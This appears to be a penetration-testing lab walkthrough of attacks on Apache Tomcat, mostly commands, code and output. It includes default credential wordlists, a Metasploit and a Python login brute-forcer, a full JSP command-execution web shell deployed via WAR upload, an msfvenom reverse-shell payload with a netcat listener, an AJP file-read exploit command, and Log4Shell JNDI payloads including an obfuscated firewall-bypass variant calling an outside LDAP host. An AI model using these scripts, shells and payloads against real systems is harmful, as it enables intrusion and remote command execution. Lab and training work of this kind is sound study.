$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
<SNIP>
<SNIP>
<!-- user manager can access only manager section -->
<role rolename="manager-gui"/>
<user username="tomcat" password="tomcat" roles="manager-gui"/>
<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui"/>
<user username="admin" password="admin" roles="manager-gui,admin-gui"/>
</tomcat-users>
gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) | admin | admin |
| apache tomcat host manager (web) | ADMIN | ADMIN |
| apache tomcat host manager (web) | admin | <blank> |
| apache tomcat host manager (web) | admin | j5Brn9 |
| apache tomcat host manager (web) | admin | tomcat |
| apache tomcat host manager (web) | cxsdk | kdsxc |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) | ovwebusr | OvW*busr1 |
| apache tomcat host manager (web) | QCC | QLogic66 |
| apache tomcat host manager (web) | role1 | role1 |
| apache tomcat host manager (web) | role1 | tomcat |
| apache tomcat host manager (web) | role | changethis |
| apache tomcat host manager (web) | root | root |
| apache tomcat host manager (web) | tomcat | changethis |
| apache tomcat host manager (web) | tomcat | s3cret |
| apache tomcat host manager (web) | tomcat | tomcat |
| apache tomcat host manager (web) | xampp | xampp |
+----------------------------------+------------+------------+
cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis
Tomcat Manager - Login Brute Force
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
#!/usr/bin/python
"""Tomcat manager / host-manager HTTP Basic-auth credential checker.

Reads a username file and a password file, sends one GET request per
username/password pair to URL + PATH with that pair as the Basic-auth
credentials, and stops at the first 200 response.

Review notes (defender's view):
- Every attempt is a separate authenticated GET to the manager path, so the
  activity shows up in the Tomcat access log as a burst of non-200 responses
  from a single client; rate-based alerting on /manager and /host-manager
  catches it.
- Tomcat's LockOutRealm (wrapped around the realm in the shipped server.xml)
  locks an account after repeated failures, which stalls this loop; a
  non-default password in tomcat-users.xml defeats the wordlists above.
"""
import requests                # third-party HTTP client (not stdlib)
from termcolor import cprint   # third-party coloured output (not stdlib)
import argparse

parser = argparse.ArgumentParser(description="Tomcat manager or host-manager credential bruteforcing")
# All four options are mandatory; there are no defaults.
parser.add_argument("-U", "--url", type=str, required=True, help="URL to tomcat page")
parser.add_argument("-P", "--path", type=str, required=True, help="manager or host-manager URI")
parser.add_argument("-u", "--usernames", type=str, required=True, help="Users File")
parser.add_argument("-p", "--passwords", type=str, required=True, help="Passwords Files")
args = parser.parse_args()
url = args.url
uri = args.path
users_file = args.usernames
passwords_file = args.passwords
# Plain concatenation with no separator handling: a URL ending in "/" plus a
# path starting with "/" (as in the sample invocation below) yields "//".
new_url = url + uri
# Both files are opened in binary mode and never closed, so every entry is
# `bytes` -- which is why the sample output prints b'tomcat' / b'admin'.
f_users = open(users_file, "rb")
f_pass = open(passwords_file, "rb")
usernames = [x.strip() for x in f_users]
passwords = [x.strip() for x in f_pass]
cprint("\n[+] Atacking.....", "red", attrs=['bold'])
for u in usernames:
    for p in passwords:
        # One request per pair; the auth tuple is sent as HTTP Basic credentials.
        r = requests.get(new_url, auth=(u, p))
        if r.status_code == 200:
            cprint("\n[+] Success!!", "green", attrs=['bold'])
            cprint("[+] Username : {} \n[+] Password : {} ".format(u, p), "green", attrs=['bold'])
            break
    # Propagate the inner break so the first hit ends the outer loop too.
    if r.status_code == 200:
        break
# NOTE(review): `r` is unbound here when either list is empty (no request was
# made), so this line would raise NameError rather than print "Failed".
if r.status_code != 200:
    cprint("\n[+] Failed!!", "red", attrs=['bold'])
    cprint("[+] Could not Find the creds :( ", "red", attrs=['bold'])
#print r.status_code
$ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
[+] Atacking.....
[+] Success!!
[+] Username : b'tomcat'
[+] Password : b'admin'
Tomcat Manager - WAR File Upload
<%@ page import="java.util.*,java.io.*" %>
<%--
  Review notes (defender's view): this is the generic JSP_KIT command page.
  Whatever arrives in the "cmd" request parameter is handed straight to
  Runtime.exec() and the process's standard output is echoed back, so it runs
  with the privileges of the Tomcat service account (uid=1001(tomcat) in the
  sample output below). Detection: scan deployed webapps for .jsp files that
  feed a request parameter into Runtime.getRuntime().exec(), and alert on
  WAR deployments through the manager application that were not scheduled.
--%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<%-- Plain GET form: the command travels in the query string, so it is also
     recorded in the access log and any proxy logs (see "?cmd=id" below). --%>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    // The raw parameter is echoed into the page without any escaping.
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    // Unvalidated parameter passed directly to the process launcher.
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();   // obtained but never used
    InputStream in = p.getInputStream();     // only stdout is read; stderr is dropped
    DataInputStream dis = new DataInputStream(in);
    // DataInputStream.readLine() is the deprecated line reader; null at EOF.
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%)
$ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
</pre>
</BODY></HTML>
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload